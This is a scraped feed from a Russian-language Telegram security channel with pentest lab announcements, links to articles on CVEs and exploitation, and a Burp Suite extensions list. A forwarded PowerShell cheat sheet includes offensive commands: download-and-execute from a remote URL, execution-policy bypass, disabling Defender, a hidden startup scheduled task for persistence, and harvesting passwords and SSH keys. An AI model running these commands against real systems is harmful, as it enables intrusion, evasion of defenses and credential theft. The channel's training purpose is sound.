Fsecurity | HH

OWASP SamuraiWTF 5.3

Виртуальная лаборатория, основанная на 🐧 для тренировки веб пентеста с открытым исходным кодом

Предустановленные лабы и инструменты:

▪️ OWASP Juice Shop
▪️ WebGoat
▪️ Mutillidae
▪️ bWAPP
▪️ DVWA
▪️ Burp Suite
▪️ Nikto
▪️ SQLMap

➡️

Home

➡️

Download

🖥

Source

🖥

Docs

#web #pentest #samurai

✈️

Whitehat Lab

Please open Telegram to view this post

VIEW IN TELEGRAM

175 views20:16

Fsecurity | HH

Ролик на канале 🍷 Приятного просмотра 🍿 🔗Ссылка: https://youtu.be/goNOkFLHzFs

👆Накидайте комментариев под ролик для продвижения 📈

165 views20:18

Fsecurity | HH

This media is not supported in your browser

VIEW IN TELEGRAM

162 views20:20

Fsecurity | HH

Хабр

Не только для райсеров. Arch Linux на Hyprland для работы и гейминга

Дисклеймер: некоторые высказывания автора несут исключительно развлекательный характер и не имеют отношения к реальности. Мотивация Уже почти год я являюсь Linux-юзером. Не сказать что супер прошарил...

🔗Ссылка:
https://habr.com/ru/articles/897858/

162 views08:03

Fsecurity | HH

Хабр

Как один разработчик предотвратил крупнейшую кибератаку: история взлома XZ Utils

Прошел ровно год с момента, когда мир с открытым ртом следил за расследованием одного из самых изощрённых бэкдоров в истории Linux. История с библиотекой xz Utils напоминала триллер: внедрение под...

🔗Ссылка:
https://habr.com/ru/companies/first/articles/897764/

183 views10:07

Fsecurity | HH

Хабр

Platformless: как Choreo создала защищенную Kubernetes-платформу с GitOps

Внутренняя платформа разработки (IDP) с открытым исходным кодом, построенная на основе Kubernetes, GitOps, и более чем 20 CNCF-инструментов, — безопасная, масштабируемая и удобная в использовании....

🔗Ссылка:
https://habr.com/ru/companies/otus/articles/897574/

159 views12:34

Fsecurity | HH

Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈

140 views12:43

Fsecurity | HH

Хабр

Топ самых интересных CVE за март 2025 года

⚠ Внимание ⚠ Вся информация, представленная ниже, предназначена только для ознакомительных целей. Автор не несет ответственности за вред, который может быть причинен с помощью предоставленной им...

🔗Ссылка:
https://habr.com/ru/companies/tomhunter/articles/891488/

154 views14:21

Fsecurity | HH

Хабр

Разбор CVE-2025-24071

Привет, Хабр! Меня зовут Илья Ефимов, я ведущий аналитик SOC компании BI.ZONE. В этой статье поговорим о нашумевшей CVE-2025-24071 , которая позволяет атакующим получить NetNTLMv2-хеш-суммы паролей в...

🔗Ссылка:
https://habr.com/ru/companies/bizone/articles/897062/

147 views16:38

Fsecurity | HH

Хабр

Инновационные технические решения и баги в исходном коде PowerShell

PowerShell — известный инструмент от Microsoft. Но какие секреты сможет найти статический анализатор в его исходном коде? Посмотрим в этой статье. PowerShell — это инструмент автоматизации от...

🔗Ссылка:
https://habr.com/ru/companies/pvs-studio/articles/897402/

140 views18:14

Fsecurity | HH

Хабр

Атака на некоторые уязвимые веб-приложения Vulnhub. Эксплуатация уязвимостей. Часть 4

Всех приветствую, читатели Хабра! Четвертая часть анализа защищенности веб-приложений Vulnhub. Ссылки на первые три части, советую ознакомиться (в первой части детально разбираю где скачать...

🔗Ссылка:
https://habr.com/ru/articles/897296/

142 views20:47

Fsecurity | HH

Хабр

В Windows обнаружили 8-летнюю дыру в безопасности, которую Microsoft не хочет исправлять

Уязвимость можно исправить, но Microsoft не хочет Игнорирование уязвимостей в операционных системах или других программных продуктах – ситуация в принципе невообразимая. Напротив, разработчики всегда...

🔗Ссылка:
https://habr.com/ru/companies/x-com/articles/897158/

131 views08:05

Fsecurity | HH

Forwarded from s0ld13r ch. (s0ld13r)

Threat Intelligence drop ragghhhh 🕺🕺

Рефлексируя тематику этого канала, решил запустить небольшой комьюнити проект для шейра индикаторов компрометации и угроз которые таргетят Центральную Азию (и не только) 💃

Думаю это логичное продолжение тематики TI на канале, чтобы где то можно было собрать все находки и передавать их комьюнити ❤️

В скором времени начну активно добавлять IoC с различных исследований, фидов и залью индикаторы которые смог найти в предыдущих постах 😎

Буду рад вкладу каждого в развитие TI платформы (на базе MISP) — можно присылать свои находки, ссылки на репорты, дампы, фиды и просто идеи. Даже маленький IoC может оказаться критически важным для других, все абсолютно бесплатно и на безвозмездной основе, если будет желание подключиться и помочь то мой лс всегда открыт 😸

Рад представить вам threatintel.kz 👋

🧢

s0ld13r

Please open Telegram to view this post

VIEW IN TELEGRAM

❤1

142 views10:27

Fsecurity | HH

Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈

125 views11:39

Fsecurity | HH

SecurityLab.ru

Двойная жизнь цифрового гения: днем спасал Windows, ночью взламывал корпорации

История EncryptHub, который покорил 600 компаний, но прокололся на беседах c ChatGPT.

🔗Ссылка:
https://www.securitylab.ru/news/558066.php

130 views12:12

Fsecurity | HH

Forwarded from Whitehat Lab

🏃

Powershell Tips & Tricks

Для выполнения некоторых командлетов необходим импортированный AD модуль

🖥

ADModule

Подключаем:

Import-Module C:\Microsoft.ActiveDirectory.Management.dll -Verbose
iex (new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1');Import-ActiveDirectory

или

Import-Module C:\Microsoft.ActiveDirectory.Management.dll -Verbose
Import-Module C:\ActiveDirectory\ActiveDirectory.psd1
Get-Command -Module ActiveDirectory

Информация о системе:

Get-WmiObject -Class Win32_OperatingSystem | Select-Object -Property *

Список процессов:

Get-Process | Select-Object -Property ProcessName, Id, CPU | Sort-Object -Property CPU -Descending

FailureAudit в логах:

Get-EventLog -LogName Security | Where-Object {$_.EntryType -eq 'FailureAudit'}

Сканер портов:

1..1024 | ForEach-Object { $sock = New-Object System.Net.Sockets.TcpClient; $async = $sock.BeginConnect('localhost', $_, $null, $null); $wait = $async.AsyncWaitHandle.WaitOne(100, $false); if($sock.Connected) { $_ } ; $sock.Close() }

Выполнить команду на удаленном ПК:

Invoke-Command -ComputerName TargetPC -ScriptBlock { Get-Process } -Credential (Get-Credential)

Скачать и выполнить скрипт:

$url = 'http://example.com/script.ps1'; Invoke-Expression (New-Object Net.WebClient).DownloadString($url)

Execution policy bypass:

Set-ExecutionPolicy Bypass -Scope Process -Force; .\script.ps1

Список доменных юзеров:

# Нужен AD модуль
Get-ADUser -Filter * -Properties * | Select-Object -Property Name, Enabled, LastLogonDate

Список залогиненых юзеров:

Get-WMIObject -Class Win32_ComputerSystem -Computer "HOST01" | Select-Object Username

Давно не логинились, но УЗ включена:

# Нужен AD модуль
Get-ADuser -filter {enabled -eq "True"} -properties LastlogonDate | ? {$_.lastlogondate -le (get-date).adddays(-90)} | ft Name

Прибить процесс:

Get-Process -Name "Notepad" | Stop-Process -Force

Список установленного ПО:

Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, Publisher, InstallDate

Мониторинг изменений ФС:

$watcher = New-Object System.IO.FileSystemWatcher; $watcher.Path = 'C:\'; $watcher.IncludeSubdirectories = $true; $watcher.EnableRaisingEvents = $true; Register-ObjectEvent $watcher 'Created' -Action { Write-Host 'File Created: ' $Event.SourceEventArgs.FullPath }

Отключаем Defender:

Set-MpPreference -SubmitSamplesConsent NeverSend
Set-MpPreference -MAPSReporting Disabled
Set-MpPreference -DisableRealtimeMonitoring $true

Задание в планировщик для закрепа:

$action = New-ScheduledTaskAction -Execute 'Powershell.exe' -Argument '-NoProfile -WindowStyle Hidden -Command "YourCommand"'; $trigger = New-ScheduledTaskTrigger -AtStartup; Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'MyTask' -Description 'MyDescription'

Поиск паролей в текстовых файлах:

Select-String -Path C:\Users\*\Documents\*.txt -Pattern 'password' -CaseSensitive

Собираем SSH ключи:

Get-ChildItem -Path C:\Users\*\.ssh\id_rsa -Recurse

Продолжение следует

#powershell #windows

✈️

Whitehat Lab

Please open Telegram to view this post

VIEW IN TELEGRAM

130 views14:09

Fsecurity | HH

Forwarded from Пентестер на мотоцикле

🤨

Искал медь, а нашёл золото

Наткнулся на настоящее сокровище для веб-пентестера — огромную подборку расширений для Burp Suite (Community и Pro) с их описанием на GitHub. Здесь есть всё, чтобы прокачать ваш инструмент до боевого монстра!

▎ Внутри репозитория:

➡️

Scanners — сканеры уязвимостей;

➡️

Custom Features — уникальные доработки для Burp Suite;

➡️

Beautifiers and Decoders — форматирование и декодирование данных;

➡️

Cloud Security — тестирование облачных сервисов;

➡️

Scripting — расширения для работы со скриптами и автоматизации тестирования;

➡️

OAuth and SSO — инструменты для тестирования аутентификации;

➡️

Information Gathering — сбор информации о целевой системе;

➡️

Vulnerability Specific Extensions — инструменты под конкретные уязвимости;

➡️

Web Application Firewall Evasion — обход систем веб-защиты;

➡️

Logging and Notes — ведение логов и заметок во время тестов;

➡️

Payload Generators and Fuzzers — генераторы полезных нагрузок и фаззеры;

➡️

Cryptography — инструменты для работы с шифрами/хэшами;

➡️

Tool Integration — расширения, связанные с интеграцией Burp Suite с другим программным обеспечением/инструментами;

➡️

Misc — разные полезные расширения;

➡️

Burp Extension Training Resources — обучающие материалы по работе с расширениями.

А какие добавленные расширения вам больше всего понравились?

🔗

Ссылка на подборку расширений Burp Suite

#github #материал

Please open Telegram to view this post

VIEW IN TELEGRAM

121 views16:26

About

Blog

Apps

Platform